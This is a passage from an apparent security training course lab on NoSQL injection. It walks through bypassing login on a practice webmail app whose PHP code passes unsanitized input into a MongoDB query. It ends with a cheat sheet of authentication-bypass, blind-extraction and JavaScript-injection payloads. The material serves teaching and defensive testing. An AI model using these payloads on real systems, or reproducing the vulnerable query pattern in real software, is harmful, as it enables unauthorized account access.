Introduction to NoSQL Injection

Bypassing Authentication

MangoMail

In this section, we will cover MangoMail. This web application is vulnerable to an authentication bypass.

There is a login portal on the webpage and nothing else; presumably, this is an internal webmail service.

We will fill out the form with test data and intercept the request with BurpSuite. It is assumed that you are already familiar with this process.

In the POST request, we see the URL-encoded parameters email and password, which were filled out with test data. Unsurprisingly, this login attempt fails.

On the server-side, the authentication function these parameters are being passed to looks like this:

...
if ($_SERVER['REQUEST_METHOD'] === "POST"):
    if (!isset($_POST['email'])) die("Missing `email` parameter");
    if (!isset($_POST['password'])) die("Missing `password` parameter");
    if (empty($_POST['email'])) die("`email` can not be empty");
    if (empty($_POST['password'])) die("`password` can not be empty");

    $manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
    $query = new MongoDB\Driver\Query(array("email" => $_POST['email'], "password" => $_POST['password']));
    $cursor = $manager->executeQuery('mangomail.users', $query);
        
    if (count($cursor->toArray()) > 0) {
        ...

We can see that the server checks if email and password are both given and non-empty before doing anything with them. Once that is verified, it connects to a MongoDB instance running locally and then queries mangomail to see if there is a user with the given pair of email and password, like so:

db.users.find({
    email: "<email>",
    password: "<password>"
});

The problem is that both email and username are user-controlled inputs, which are passed unsanitized into a MongoDB query. This means we (as attackers) can take control of the query.

Many query operators were introduced in the first section of this module, and you may already have an idea of how to manipulate this query. For now, we want this query to return a match on any document because this will result in us being authenticated as whoever it matched. A straightforward way to do this would be to use the $ne query operator on both email and password to match values that are not equal to something we know doesn't exist. To put it in words, we want a query that matches email is not equal to '[email protected]', and the password is not equal to 'test'.

db.users.find({
    email: {$ne: "[email protected]"},
    password: {$ne: "test"}
});

Since email and password are being passed as URL-encoded parameters, we can't just pass JSON objects; we need to change the syntax slightly. When passing URL-encoded parameters to PHP, param[$op]=val is the same as param: {$op: val} so we will try to bypass authentication with email[$ne][email protected] and password[$ne]=test

Knowing that [email protected]:test didn't log us in and are therefore invalid credentials, this should match some document in the users collection.

When we update the form parameters and forward the request, we should see that we successfully bypassed authentication.

Alternative Queries

Although $ne on both parameters worked to bypass authentication, it is always helpful to have alternatives just in case. One example would be to use the $regex query parameter on both fields to match /.*/, which means any character repeated 0 or more times and therefore matches everything.

db.users.find({
    email: {$regex: /.*/},
    password: {$regex: /.*/}
});

We can adapt this to the URL-encoded form, re-send the request, and we will bypass authentication again.

Some other payloads that would work are:

email=admin%40mangomail.com&password[$ne]=x: This assumes we know the admin's email and we wanted to target them directly
email[$gt]=&password[$gt]=: Any string is 'greater than' an empty string
email[$gte]=&password[$gte]=: Same logic as above

Aside from this, you can mix and match operators to achieve the same effect. Taking a bit of time to understand query operators better will be helpful when you try to exploit NoSQL injection in the wild.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 10 Bypass authentication on MangoMail and submit the flag.

+10 Streak pts

Previous Next

Go to Questions

Tools of the Trade

Defending against NoSQL Injection

Preventing NoSQL Injection Vulnerabilities

Skills Assessment

Skills Assessment I Skills Assessment II

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

MongoDB Usage

Connect to MongoDB: mongosh mongodb://127.0.0.1:27017
List databases: show databases
List collections: show collections
Insert data: db.collection.insertOne({...})
Insert lots of data: db.apples.insertMany([{...},{...},...])
Selecting data: db.collection.find({...})
Selecting one piece of data: db.collection.findOne({...})
Update (one) document: db.collection.updateOne({...}, {...})
Update multiple documents: db.collection.updateMany({...}, {...})
Delete document(s): db.apples.remove({...})

Query Operators

Type	Operator	Description	Example
Comparison	`$eq`	Matches values which are `equal to` a specified value	`type: {$eq: "Pink Lady"}`
Comparison	`$gt`	Matches values which are `greater than` a specified value	`price: {$gt: 0.30}`
Comparison	`$gte`	Matches values which are `greater than or equal to` a specified value	`price: {$gte: 0.50}`
Comparison	`$in`	Matches values which exist `in the specified array`	`type: {$in: ["Granny Smith", "Pink Lady"]}`
Comparison	`$lt`	Matches values which are `less than` a specified value	`price: {$lt: 0.60}`
Comparison	`$lte`	Matches values which are `less than or equal to` a specified value	`price: {$lte: 0.75}`
Comparison	`$nin`	Matches values which are `not in the specified array`	`type: {$nin: ["Golden Delicious", "Granny Smith"]}`
Logical	`$and`	Matches documents which `meet the conditions of both` specified queries	`$and: [{type: 'Granny Smith'}, {price: 0.65}]`
Logical	`$not`	Matches documents which `do not meet the conditions` of a specified query	`type: {$not: {$eq: "Granny Smith"}}`
Logical	`$nor`	Matches documents which `do not meet the conditions` of any of the specified queries	`$nor: [{type: 'Granny Smith'}, {price: 0.79}]`
Logical	`$or`	Matches documents which `meet the conditions of one` of the specified queries	`$or: [{type: 'Granny Smith'}, {price: 0.79}]`
Evaluation	`$mod`	Matches values which divided by a `specific divisor` have the `specified remainder`	`price: {$mod: [4, 0]}`
Evaluation	`$regex`	Matches values which `match a specified RegEx`	`type: {$regex: /^G.*/}`
Evaluation	`$where`	Matches documents which `satisfy a JavaScript expression`	`$where: 'this.type.length === 9'`

Authentication Bypass / Data Exfiltration Payloads:

URL-Encoded

param[$ne]=x
param[$gt]=
param[$gte]=
param[$lt]=~
param[$lte]=~
param[$regex]=.*

JSON

{param: {$ne: 'x'}}
{param: {$gt: ''}}
{param: {$gte: ''}}
{param: {$lt: '~'}}
{param: {$lte: '~'}}
{param: {$regex: '.*'}}
{param: {$nin: []}}

Blind NoSQLi Payloads:

URL-Encoded

param[$regex]=^XYZ.*$

JSON

{param: {$regex: '^XYZ.*$}}

Server-Side JavaScript Injection Payloads:

' || true || ''=='
" || true || ""=="

This cheat sheet contains a (non-comprehensive) list of payloads you may use when testing an application for NoSQL injection vulnerabilities. The most important qualities for finding vulnerabilities are creativity and the ability to adapt, so it is possible that these payloads will not work in your specific scenario, but something else does.

Some other resources you may want to refer to may be:

Introduction to NoSQL Injection

Bypassing Authentication

MangoMail

Alternative Queries

Questions

Table of Contents

Introduction

Basic NoSQL Injection

Blind Data Exfiltration

Tools of the Trade

Defending against NoSQL Injection

Skills Assessment

My Workstation